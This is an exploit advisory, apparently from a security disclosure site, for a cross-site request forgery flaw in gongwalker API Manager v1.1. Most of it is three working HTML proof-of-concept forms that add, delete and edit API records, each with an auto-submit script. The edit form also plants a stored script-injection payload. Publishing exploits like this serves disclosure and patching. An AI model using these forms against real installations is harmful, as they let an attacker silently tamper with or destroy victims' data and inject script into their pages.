Gongwalker API Manager 1.1 Cross Site Request Forgery

2017.05.11
Credit: HaHwul
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-352

# Exploit Title: gongwalker API Manager v1.1 - CSRF(Add/Delete/Edit API) # Date: 2017-05-10 # Exploit Author: HaHwul # Exploit Author Blog: www.hahwul.com # Vendor Homepage: https://github.com/gongwalker/ApiManager # Software Link: https://github.com/gongwalker/ApiManager.git # Version: v1.1 # Tested on: Debian ### CSRF1 - ADD API Data <form name="csrf_poc" action="http://127.0.0.1/vul_test/ApiManager/index.php?op=add&act=api&tag=2&type=do" method="POST"> <input type="hidden" name="num" value="test"> <input type="hidden" name="p%5Bname%5D%5B%5D" value="test"> <input type="hidden" name="p%5BparamType%5D%5B%5D" value="lkj"> <input type="hidden" name="memo" value="kj"> <input type="hidden" name="p%5Bdes%5D%5B%5D" value=""> <input type="hidden" name="type" value="GET"> <input type="hidden" name="url" value="test"> <input type="hidden" name="p%5Btype%5D%5B%5D" value="Y"> <input type="hidden" name="p%5Bdefault%5D%5B%5D" value=""> <input type="hidden" name="des" value="test"> <input type="hidden" name="re" value="lkj"> <input type="hidden" name="name" value="test"> <input type="submit" value="Replay!"> </form> <!-- Auto-submit script: <script type="text/javascript">document.forms.csrf_poc.submit();</script> --> ### CSRF2 - Delete API Data <form name="csrf_poc" action="http://127.0.0.1/vul_test/ApiManager/index.php?op=apiDelete&act=ajax" method="POST"> <input type="hidden" name="id" value="3"> <input type="submit" value="Replay!"> </form> <!-- Auto-submit script: <script type="text/javascript">document.forms.csrf_poc.submit();</script> --> ### CSRF3 - EDIT API Data <form name="csrf_poc" action="http://127.0.0.1/vul_test/ApiManager/index.php?op=edit&act=api&tag=2&type=do" method="POST"> <input type="hidden" name="num" value="001"> <input type="hidden" name="p%5Bname%5D%5B%5D" value="password"> <input type="hidden" name="p%5BparamType%5D%5B%5D" value="CSRF_PASSWORD"> <input type="hidden" name="memo" value="login_name \x4e0e email \x4e8c\x9009\x5176\x4e00654<script>alert('csrf')</script>"> <input type="hidden" name="p%5Bdes%5D%5B%5D" value="\x5bc6\x7801"> <input type="hidden" name="type" value="POST"> <input type="hidden" name="url" value="http://api.xxx.com"> <input type="hidden" name="p%5Btype%5D%5B%5D" value="Y"> <input type="hidden" name="p%5Bdefault%5D%5B%5D" value=""> <input type="hidden" name="des" value="\x4f1a\x5458\x767b\x5f55\x8c03\x7528\x6b64\x63a5\x53e3"> <input type="hidden" name="re" value="{\r\n \"status\": 1, \r\n \"info\": \"\x767b\x5f55\x6210\x529f\", \r\n \"data\": [ ]\r\n}"> <input type="hidden" name="name" value="\x4f1a\x5458\x767b\x5f55"> <input type="hidden" name="id" value="2"> <input type="submit" value="Replay!"> </form> <!-- Auto-submit script: <script type="text/javascript">document.forms.csrf_poc.submit();</script> -->


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2017, cxsecurity.com

 

Back to Top